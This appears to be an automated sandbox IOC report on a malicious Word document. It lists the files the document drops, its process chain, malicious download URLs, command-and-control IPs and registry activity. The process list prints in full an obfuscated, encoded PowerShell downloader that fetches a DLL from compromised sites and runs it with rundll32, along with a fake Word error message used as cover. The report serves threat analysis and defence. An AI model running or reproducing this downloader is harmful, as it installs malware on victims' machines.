IOCReport

loading gif

Files

File Path
Type
Category
Malicious
info_2020_NJY_31940448.doc
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Subject: ADP Rubber Gorgeous Plastic Towels Buckinghamshire hard drive backing up orchid blue functionalities, Author: Clia Petit, Template: Normal.dotm, Last Saved By: Elisa Leclercq, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Dec 29 13:35:00 2020, Last Saved Time/Date: Tue Dec 29 13:36:00 2020, Number of Pages: 1, Number of Words: 2202, Number of Characters: 12554, Security: 8
initial sample
malicious
C:\Users\user\Ygyhlqt\Bx5jfmo\R43H.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A07B73A5-D643-47FF-B622-0CF30ED55516}.tmp
data
dropped
clean
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
ASCII text, with CRLF line terminators
dropped
clean
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\info_2020_NJY_31940448.LNK
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:16 2020, mtime=Wed Aug 26 14:08:16 2020, atime=Wed Jan 13 23:31:41 2021, length=163328, window=hide
dropped
clean
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
data
dropped
clean
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DJ17GIRPUSXWYYEETPX6.temp
data
dropped
clean
C:\Users\user\Desktop\~$fo_2020_NJY_31940448.doc
data
dropped
clean

Processes

Path
Cmdline
Malicious
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
malicious
C:\Windows\System32\cmd.exe
cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD JAA2ADkAbQBEAFQANwAgACAAPQAgAFsAdAB5AFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADIAfQAiAC0AZgAnAFIAJwAsACcAUwAnACwAJwBZACcALAAnAFkAUwB0AEUATQAuAEkATwAuAGQAaQBSAEUAYwBUAE8AJwApACAAOwAgACAAIAAkAHkAMQAwAEkAIAAgAD0AIABbAFQAeQBwAEUAXQAoACIAewA2AH0AewAzAH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewA1AH0AewA4AH0AewAwAH0AIgAtAGYAIAAnAGEARwBlAFIAJwAsACcAdAAuACcALAAnAEUAJwAsACcAWQBTAHQAJwAsACcATgBFACcALAAnAHMARQBSAHYAaQBDACcALAAnAHMAJwAsACcAbQAuACcALAAnAGUAUABvAGkAbgB0AG0AYQBuACcAKQA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwBpACcAKwAnAGwAZQBuAHQAbAB5ACcAKQArACgAJwBDAG8AJwArACcAbgAnACkAKwAnAHQAJwArACgAJwBpAG4AJwArACcAdQAnACkAKwAnAGUAJwApADsAJABQAHkAMABlAGIAagBpAD0AJABLADEAMgBPACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABQADYANQBaADsAJABYADkAMgBDAD0AKAAoACcAVQAnACsAJwBfADgAJwApACsAJwBSACcAKQA7ACAAIAAkADYAOQBNAGQAdAA3ADoAOgAiAEMAcgBgAGUAYQBUAGAARQBkAEkAUgBFAEMAdABvAGAAUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAWgAnACsAKAAnAE0AJwArACcAUABZAGcAeQAnACsAJwBoACcAKQArACgAJwBsAHEAdABaACcAKwAnAE0AJwApACsAJwBQAEIAJwArACgAJwB4ACcAKwAnADUAagAnACkAKwAnAGYAJwArACgAJwBtAG8AWgBNACcAKwAnAFAAJwApACkALQBSAGUAcABsAGEAYwBFACgAWwBDAGgAYQBSAF0AOQAwACsAWwBDAGgAYQBSAF0ANwA3ACsAWwBDAGgAYQBSAF0AOAAwACkALABbAEMAaABhAFIAXQA5ADIAKQApADsAJABHADcANwBHAD0AKAAnAFgAOAAnACsAJwAwAFAAJwApADsAIAAkAHkAMQAwAEkAOgA6ACIAUwBlAEMAdQByAEkAdABgAHkAcAByAE8AYABUAE8AYABjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQASgAzADQASgA9ACgAKAAnAFoAMgAnACsAJwA4ACcAKQArACcATgAnACkAOwAkAFIAaQA2ADIAcwBvAGsAIAA9ACAAKAAnAFIANAAnACsAJwAzAEgAJwApADsAJABUADkAXwBJAD0AKAAnAEgANQAnACsAJwA4AEwAJwApADsAJABCAGgAbgB3AGUAOQAyAD0AJABIAE8ATQBFACsAKAAoACcATQBvACcAKwAoACcAUQBZAGcAJwArACcAeQAnACkAKwAoACcAaABsAHEAdABNAG8AUQAnACsAJwBCACcAKwAnAHgAJwApACsAKAAnADUAagBmAG0AJwArACcAbwBNACcAKwAnAG8AUQAnACkAKQAuACIAcgBgAEUAUABsAGAAQQBDAGUAIgAoACgAJwBNAG8AJwArACcAUQAnACkALABbAFMAVABSAGkATgBHAF0AWwBDAEgAQQByAF0AOQAyACkAKQArACQAUgBpADYAMgBzAG8AawArACgAKAAnAC4AJwArACcAZABsACcAKQArACcAbAAnACkAOwAkAFcANQAwAFYAPQAoACcAWQAnACsAKAAnADcAOQAnACsAJwBZACcAKQApADsAJABPAGcAXwA0ADMAXwBtAD0AKAAnAF0AJwArACgAJwBiADIAWwBzADoAJwArACcALwAnACsAJwAvAGEAbABsACcAKQArACgAJwBjAGEAJwArACcAbgBuAGEAYgBpACcAKwAnAHMAbQBlACcAKQArACgAJwBkACcAKwAnAHMALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwB1ACcAKwAnAG4AcgAnACkAKwAoACcAYQBpAGQALQAnACsAJwBtAGEAcAAvAFoAJwArACcAWgAnACkAKwAoACcAbQAnACsAJwA2AC8AJwArACcAQABdAGIAJwApACsAKAAnADIAWwAnACsAJwBzACcAKQArACgAJwA6AC8ALwBnACcAKwAnAGkAJwArACcAYQBuACcAKQArACcAbgAnACsAKAAnAGEAJwArACcAcwBwAHMAeQAnACsAJwBjACcAKQArACcAaABpACcAKwAoACcAYwAnACsAJwBzAHQAdQAnACkAKwAoACcAZABpACcAKwAnAG8ALgBjAG8AbQAnACkAKwAoACcALwAnACsAJwBjAGcAaQAtACcAKQArACgAJwBiAGkAJwArACcAbgAvAFAAJwArACcAUAAvAEAAJwArACcAXQAnACkAKwAoACcAYgAnACsAJwAyAFsAcwA6ACcAKQArACcALwAvACcAKwAoACcAaQBlAG4AZwAnACsAJwBsAGkAcwBoACcAKwAnAGEAYgBjAC4AJwArACcAYwAnACkAKwAoACcAbwAnACsAJwBtAC8AJwApACsAKAAnAGMAJwArACcAbwB3AC8AJwArACcASgBIAC8AQAAnACsAJwBdAGIAMgBbAHMAOgAvACcAKQArACcALwBhACcAKwAoACcAYgAnACsAJwByAGkAbAAnACkAKwAoACcAbABvAGYAJwArACcAdQAnACkAKwAoACcAcgBuAGkAdAAnACsAJwB1ACcAKQArACgAJwByACcAKwAnAGUALgBjACcAKQArACgAJwBvAG0ALwBiACcAKwAnAHAAaAAnACsAJwAtACcAKwAnAG4AYwBsAGUAeAAtAHcAeQAnACsAJwBnACcAKQArACgAJwBxACcAKwAnADQAJwArACcALwBhADcAbgBCACcAKQArACcAZgAnACsAKAAnAGgAcwAnACsAJwAvACcAKQArACcAQAAnACsAJwBdACcAKwAoACcAYgAyACcAKwAnAFsAJwApACsAKAAnAHMAJwArACcAcwA6AC8AJwArACcALwBlAHQAJwArACcAawAnACsAJwBpAG4AZABlAGQAJwApACsAKAAnAGUAawAnACsAJwB0AGkAZgBsAGkAawAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAHAAYwAnACsAJwBpAGUALQBzACcAKwAnAHAAJwApACsAJwBlACcAKwAoACcAZQBkAC8AJwArACcAVQAvAEAAXQBiADIAWwAnACsAJwBzAHMAJwApACsAKAAnADoALwAvAHYAcwB0ACcAKwAnAHMAJwArACcAYQAnACkAKwAnAG0AcAAnACsAKAAnAGwAZQAnACsAJwAuAGMAbwBtAC8AdwBwAC0AJwArACcAaQBuAGMAbAAnACsAJwB1AGQAJwArACcAZQBzACcAKwAnAC8AJwArACcANwBlAFgAJwApACsAKAAnAGUASQAnACsAJwAvACcAKwAnAEAAXQBiADIAWwAnACkAKwAnAHMAOgAnACsAJwAvAC8AJwArACgAJwBlAHoAaQAnACsAJwAtAHAAbwBzAC4AYwAnACsAJwBvAG0ALwBjACcAKwAnAGEAdABlAGcAbwByAHkAJwArACcAbAAnACsAJwAvAHgALwAnACkAKQAuACIAcgBFAHAAbABBAGAAYwBlACIAKAAoACcAXQAnACsAKAAnAGIAJwArACcAMgBbAHMAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAHMAZAAnACwAJwBzAHcAJwApACwAKAAnAGgAdAAnACsAJwB0AHAAJwApACwAJwAzAGQAJwApAFsAMQBdACkALgAiAFMAYABQAGwASQBUACIAKAAkAFIANgA5AEsAIAArACAAJABQAHkAMABlAGIAagBpACAAKwAgACQAUQAzADMASQApADsAJABaADQANABTAD0AKAAoACcARAA4ACcAKwAnADcAJwApACsAJwBPACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAVQBqAHQAcwBwAGUAaAAgAGkAbgAgACQATwBnAF8ANAAzAF8AbQApAHsAdAByAHkAewAoACYAKAAnAE4AZQB3ACcAKwAnAC0ATwBiACcAKwAnAGoAZQBjAHQAJwApACAAUwB5AFMAdABFAG0ALgBuAGUAVAAuAHcAZQBCAEMAbABJAEUAbgB0ACkALgAiAGQAYABPAFcATgBMAG8AYQBkAEYAaQBgAGwARQAiACgAJABVAGoAdABzAHAAZQBoACwAIAAkAEIAaABuAHcAZQA5ADIAKQA7ACQAWAA3ADAAQgA9ACgAJwBPACcAKwAoACcANAAnACsAJwAwAEgAJwApACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQBJACcAKwAnAHQAZQAnACsAJwBtACcAKQAgACQAQgBoAG4AdwBlADkAMgApAC4AIgBsAGAAZQBuAGcAVABoACIAIAAtAGcAZQAgADMANwA2ADUAMgApACAAewAmACgAJwByAHUAJwArACcAbgBkACcAKwAnAGwAbAAzADIAJwApACAAJABCAGgAbgB3AGUAOQAyACwAKAAnAEMAJwArACcAbwBuACcAKwAnAHQAJwArACgAJwByAG8AJwArACcAbAAnACsAJwBfAFIAdQBuACcAKQArACgAJwBEACcAKwAnAEwATAAnACkAKQAuACIAVABvAGAAUwBUAHIASQBgAE4AZwAiACgAKQA7ACQATQA0ADcAVwA9ACgAJwBBADcAJwArACcAMQBKACcAKQA7AGIAcgBlAGEAawA7ACQARwA1ADIASgA9ACgAKAAnAEMAJwArACcAMgAwACcAKQArACcAQwAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEIAMwAzAFQAPQAoACcAUQA5ACcAKwAnADYAVAAnACkA
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
POwersheLL -w hidden -ENCOD JAA2ADkAbQBEAFQANwAgACAAPQAgAFsAdAB5AFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADIAfQAiAC0AZgAnAFIAJwAsACcAUwAnACwAJwBZACcALAAnAFkAUwB0AEUATQAuAEkATwAuAGQAaQBSAEUAYwBUAE8AJwApACAAOwAgACAAIAAkAHkAMQAwAEkAIAAgAD0AIABbAFQAeQBwAEUAXQAoACIAewA2AH0AewAzAH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewA1AH0AewA4AH0AewAwAH0AIgAtAGYAIAAnAGEARwBlAFIAJwAsACcAdAAuACcALAAnAEUAJwAsACcAWQBTAHQAJwAsACcATgBFACcALAAnAHMARQBSAHYAaQBDACcALAAnAHMAJwAsACcAbQAuACcALAAnAGUAUABvAGkAbgB0AG0AYQBuACcAKQA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwBpACcAKwAnAGwAZQBuAHQAbAB5ACcAKQArACgAJwBDAG8AJwArACcAbgAnACkAKwAnAHQAJwArACgAJwBpAG4AJwArACcAdQAnACkAKwAnAGUAJwApADsAJABQAHkAMABlAGIAagBpAD0AJABLADEAMgBPACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABQADYANQBaADsAJABYADkAMgBDAD0AKAAoACcAVQAnACsAJwBfADgAJwApACsAJwBSACcAKQA7ACAAIAAkADYAOQBNAGQAdAA3ADoAOgAiAEMAcgBgAGUAYQBUAGAARQBkAEkAUgBFAEMAdABvAGAAUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAWgAnACsAKAAnAE0AJwArACcAUABZAGcAeQAnACsAJwBoACcAKQArACgAJwBsAHEAdABaACcAKwAnAE0AJwApACsAJwBQAEIAJwArACgAJwB4ACcAKwAnADUAagAnACkAKwAnAGYAJwArACgAJwBtAG8AWgBNACcAKwAnAFAAJwApACkALQBSAGUAcABsAGEAYwBFACgAWwBDAGgAYQBSAF0AOQAwACsAWwBDAGgAYQBSAF0ANwA3ACsAWwBDAGgAYQBSAF0AOAAwACkALABbAEMAaABhAFIAXQA5ADIAKQApADsAJABHADcANwBHAD0AKAAnAFgAOAAnACsAJwAwAFAAJwApADsAIAAkAHkAMQAwAEkAOgA6ACIAUwBlAEMAdQByAEkAdABgAHkAcAByAE8AYABUAE8AYABjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQASgAzADQASgA9ACgAKAAnAFoAMgAnACsAJwA4ACcAKQArACcATgAnACkAOwAkAFIAaQA2ADIAcwBvAGsAIAA9ACAAKAAnAFIANAAnACsAJwAzAEgAJwApADsAJABUADkAXwBJAD0AKAAnAEgANQAnACsAJwA4AEwAJwApADsAJABCAGgAbgB3AGUAOQAyAD0AJABIAE8ATQBFACsAKAAoACcATQBvACcAKwAoACcAUQBZAGcAJwArACcAeQAnACkAKwAoACcAaABsAHEAdABNAG8AUQAnACsAJwBCACcAKwAnAHgAJwApACsAKAAnADUAagBmAG0AJwArACcAbwBNACcAKwAnAG8AUQAnACkAKQAuACIAcgBgAEUAUABsAGAAQQBDAGUAIgAoACgAJwBNAG8AJwArACcAUQAnACkALABbAFMAVABSAGkATgBHAF0AWwBDAEgAQQByAF0AOQAyACkAKQArACQAUgBpADYAMgBzAG8AawArACgAKAAnAC4AJwArACcAZABsACcAKQArACcAbAAnACkAOwAkAFcANQAwAFYAPQAoACcAWQAnACsAKAAnADcAOQAnACsAJwBZACcAKQApADsAJABPAGcAXwA0ADMAXwBtAD0AKAAnAF0AJwArACgAJwBiADIAWwBzADoAJwArACcALwAnACsAJwAvAGEAbABsACcAKQArACgAJwBjAGEAJwArACcAbgBuAGEAYgBpACcAKwAnAHMAbQBlACcAKQArACgAJwBkACcAKwAnAHMALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwB1ACcAKwAnAG4AcgAnACkAKwAoACcAYQBpAGQALQAnACsAJwBtAGEAcAAvAFoAJwArACcAWgAnACkAKwAoACcAbQAnACsAJwA2AC8AJwArACcAQABdAGIAJwApACsAKAAnADIAWwAnACsAJwBzACcAKQArACgAJwA6AC8ALwBnACcAKwAnAGkAJwArACcAYQBuACcAKQArACcAbgAnACsAKAAnAGEAJwArACcAcwBwAHMAeQAnACsAJwBjACcAKQArACcAaABpACcAKwAoACcAYwAnACsAJwBzAHQAdQAnACkAKwAoACcAZABpACcAKwAnAG8ALgBjAG8AbQAnACkAKwAoACcALwAnACsAJwBjAGcAaQAtACcAKQArACgAJwBiAGkAJwArACcAbgAvAFAAJwArACcAUAAvAEAAJwArACcAXQAnACkAKwAoACcAYgAnACsAJwAyAFsAcwA6ACcAKQArACcALwAvACcAKwAoACcAaQBlAG4AZwAnACsAJwBsAGkAcwBoACcAKwAnAGEAYgBjAC4AJwArACcAYwAnACkAKwAoACcAbwAnACsAJwBtAC8AJwApACsAKAAnAGMAJwArACcAbwB3AC8AJwArACcASgBIAC8AQAAnACsAJwBdAGIAMgBbAHMAOgAvACcAKQArACcALwBhACcAKwAoACcAYgAnACsAJwByAGkAbAAnACkAKwAoACcAbABvAGYAJwArACcAdQAnACkAKwAoACcAcgBuAGkAdAAnACsAJwB1ACcAKQArACgAJwByACcAKwAnAGUALgBjACcAKQArACgAJwBvAG0ALwBiACcAKwAnAHAAaAAnACsAJwAtACcAKwAnAG4AYwBsAGUAeAAtAHcAeQAnACsAJwBnACcAKQArACgAJwBxACcAKwAnADQAJwArACcALwBhADcAbgBCACcAKQArACcAZgAnACsAKAAnAGgAcwAnACsAJwAvACcAKQArACcAQAAnACsAJwBdACcAKwAoACcAYgAyACcAKwAnAFsAJwApACsAKAAnAHMAJwArACcAcwA6AC8AJwArACcALwBlAHQAJwArACcAawAnACsAJwBpAG4AZABlAGQAJwApACsAKAAnAGUAawAnACsAJwB0AGkAZgBsAGkAawAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAHAAYwAnACsAJwBpAGUALQBzACcAKwAnAHAAJwApACsAJwBlACcAKwAoACcAZQBkAC8AJwArACcAVQAvAEAAXQBiADIAWwAnACsAJwBzAHMAJwApACsAKAAnADoALwAvAHYAcwB0ACcAKwAnAHMAJwArACcAYQAnACkAKwAnAG0AcAAnACsAKAAnAGwAZQAnACsAJwAuAGMAbwBtAC8AdwBwAC0AJwArACcAaQBuAGMAbAAnACsAJwB1AGQAJwArACcAZQBzACcAKwAnAC8AJwArACcANwBlAFgAJwApACsAKAAnAGUASQAnACsAJwAvACcAKwAnAEAAXQBiADIAWwAnACkAKwAnAHMAOgAnACsAJwAvAC8AJwArACgAJwBlAHoAaQAnACsAJwAtAHAAbwBzAC4AYwAnACsAJwBvAG0ALwBjACcAKwAnAGEAdABlAGcAbwByAHkAJwArACcAbAAnACsAJwAvAHgALwAnACkAKQAuACIAcgBFAHAAbABBAGAAYwBlACIAKAAoACcAXQAnACsAKAAnAGIAJwArACcAMgBbAHMAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAHMAZAAnACwAJwBzAHcAJwApACwAKAAnAGgAdAAnACsAJwB0AHAAJwApACwAJwAzAGQAJwApAFsAMQBdACkALgAiAFMAYABQAGwASQBUACIAKAAkAFIANgA5AEsAIAArACAAJABQAHkAMABlAGIAagBpACAAKwAgACQAUQAzADMASQApADsAJABaADQANABTAD0AKAAoACcARAA4ACcAKwAnADcAJwApACsAJwBPACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAVQBqAHQAcwBwAGUAaAAgAGkAbgAgACQATwBnAF8ANAAzAF8AbQApAHsAdAByAHkAewAoACYAKAAnAE4AZQB3ACcAKwAnAC0ATwBiACcAKwAnAGoAZQBjAHQAJwApACAAUwB5AFMAdABFAG0ALgBuAGUAVAAuAHcAZQBCAEMAbABJAEUAbgB0ACkALgAiAGQAYABPAFcATgBMAG8AYQBkAEYAaQBgAGwARQAiACgAJABVAGoAdABzAHAAZQBoACwAIAAkAEIAaABuAHcAZQA5ADIAKQA7ACQAWAA3ADAAQgA9ACgAJwBPACcAKwAoACcANAAnACsAJwAwAEgAJwApACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQBJACcAKwAnAHQAZQAnACsAJwBtACcAKQAgACQAQgBoAG4AdwBlADkAMgApAC4AIgBsAGAAZQBuAGcAVABoACIAIAAtAGcAZQAgADMANwA2ADUAMgApACAAewAmACgAJwByAHUAJwArACcAbgBkACcAKwAnAGwAbAAzADIAJwApACAAJABCAGgAbgB3AGUAOQAyACwAKAAnAEMAJwArACcAbwBuACcAKwAnAHQAJwArACgAJwByAG8AJwArACcAbAAnACsAJwBfAFIAdQBuACcAKQArACgAJwBEACcAKwAnAEwATAAnACkAKQAuACIAVABvAGAAUwBUAHIASQBgAE4AZwAiACgAKQA7ACQATQA0ADcAVwA9ACgAJwBBADcAJwArACcAMQBKACcAKQA7AGIAcgBlAGEAawA7ACQARwA1ADIASgA9ACgAKAAnAEMAJwArACcAMgAwACcAKQArACcAQwAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEIAMwAzAFQAPQAoACcAUQA5ACcAKwAnADYAVAAnACkA
malicious
C:\Windows\System32\rundll32.exe
'C:\Windows\system32\rundll32.exe' C:\Users\user\Ygyhlqt\Bx5jfmo\R43H.dll Control_RunDLL
malicious
C:\Windows\SysWOW64\rundll32.exe
'C:\Windows\system32\rundll32.exe' C:\Users\user\Ygyhlqt\Bx5jfmo\R43H.dll Control_RunDLL
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Slimgulabo\vhtbjtkrz.lpr',Control_RunDLL
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bvjuzxolryfk\tucwdqbdtfe.wnx',Control_RunDLL
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bsmdm\ghwk.vcj',Control_RunDLL
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Anheubolw\yblyupae.she',Control_RunDLL
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bwaqczxvcucs\mfqhcresmvq.yyb',Control_RunDLL
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vvkklg\owmtf.xpy',Control_RunDLL
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eqlmzzdzvxl\jxrtnvzlrw.xix',Control_RunDLL
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qjhyis\vvyps.icm',Control_RunDLL
malicious
C:\Windows\System32\msg.exe
msg user /v Word experienced an error trying to open the file.
clean
There are 4 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://ezi-pos.com/categoryl/x/
unknown
malicious
http://allcannabismeds.com/unraid-map/ZZm6/
35.208.69.64
malicious
https://etkindedektiflik.com/pcie-speed/U/
unknown
malicious
http://ienglishabc.com/cow/JH/
unknown
malicious
http://allcannabismeds.com
unknown
malicious
http://giannaspsychicstudio.com/cgi-bin/PP/
unknown
malicious
http://abrillofurniture.com/bph-nclex-wygq4/a7nBfhs/
unknown
malicious
https://vstsample.com/wp-includes/7eXeI/
unknown
malicious
http://152.170.79.100/tkvop2zz2se/0vkwo/
152.170.79.100
malicious
http://www.windows.com/pctv.
unknown
clean
http://investor.msn.com
unknown
clean
http://www.msnbc.com/news/ticker.txt
unknown
clean
http://wellformedweb.org/CommentAPI/
unknown
clean
http://www.iis.fhg.de/audioPA
unknown
clean
http://windowsmedia.com/redir/services.asp?WMPFriendly=true
unknown
clean
http://www.hotmail.com/oe
unknown
clean
http://treyresearch.net
unknown
clean
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
unknown
clean
http://www.icra.org/vocabulary/.
unknown
clean
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
unknown
clean
http://investor.msn.com/
unknown
clean
http://www.piriform.com/ccleanerhttp:
unknown
clean
http://www.piriform.com/ccleaner
unknown
clean
http://computername/printers/printername/.printer
unknown
clean
http://www.%s.comPA
unknown
clean
There are 15 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
allcannabismeds.com
35.208.69.64
malicious

IPs

IP
Domain
Country
Active
Malicious
152.170.79.100
unknown
Argentina
unknown
malicious
35.208.69.64
unknown
United States
unknown
malicious

Registry

Path
Value
Malicious
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
i7
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
MTTT
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
'k7
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
l7
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
VBAFiles
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
ReviewToken
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
EE1C7
clean